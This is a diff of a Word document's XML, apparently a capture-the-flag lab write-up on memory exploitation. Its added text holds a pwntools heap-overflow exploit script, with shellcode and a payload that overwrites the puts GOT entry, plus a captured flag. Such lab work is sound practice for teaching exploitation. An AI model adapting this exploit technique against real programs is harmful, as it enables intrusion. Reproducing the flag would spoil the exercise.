+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="10" name="Picture 10" descr="Text&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2298065"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>from pwn import *</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>programPath = "/problems/p03-1_2_1110c08a53141f86c1889e0828d09e30/example414"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>sh = process(programPath)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>output = sh.recvline(timeout=5)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>firstAddress = output[18:output.index(",")]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>changedFirstAddress = p32(int(firstAddress, 16) + 8)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">puts_got_changed_addr = 0x804d024 -12 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>shellcode = 8*"A"+"\xb8\xd6\x88\x04\x08\xff\xe0"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>#698+4 (header) == 702 rounded up to the nearest multiple of 8 == 704; 704-4 = 700</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>payload = shellcode + (700-4-len(shellcode))*"A"+"BBBB"+"\xfc\xff\xff\xff"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>payload += p32(puts_got_changed_addr)+changedFirstAddress</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>sh.sendline(payload)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>sh.recvuntil("third?\n")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>sh.sendline("Third")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>print(sh.recvall().decode())</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="559B908C" wp14:editId="44A9E329">
+            <wp:extent cx="5943600" cy="746125"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="11" name="Picture 11" descr="A picture containing graphical user interface&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="11" name="Picture 11" descr="A picture containing graphical user interface&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="746125"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Memory 2 (03-2)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Flag: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>c22632e2d0ab9e4bb06ac8d62e21f816</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CC77729" wp14:editId="7B331C0F">
+            <wp:extent cx="3943350" cy="247650"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="12" name="Picture 12"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3943350" cy="247650"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17E8B05F" wp14:editId="10764CF7">
+            <wp:extent cx="5943600" cy="752475"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="13" name="Picture 13" descr="A computer screen capture&#10;&#10;Description automatically generated with medium confidence"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="13" name="Picture 13" descr="A computer screen capture&#10;&#10;Description automatically generated with medium confidence"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="752475"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Memory </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (03-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>+</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>'\xa0\x84\x04\x08'</w:t>
-      </w:r>
-      <w:r>
-        <w:t>" | ./vuln</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -1600,7 +2185,7 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
     <w:qFormat/>
-    <w:rsid w:val="005871F0"/>
+    <w:rsid w:val="00C574F4"/>
   </w:style>
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>

</xml_diff>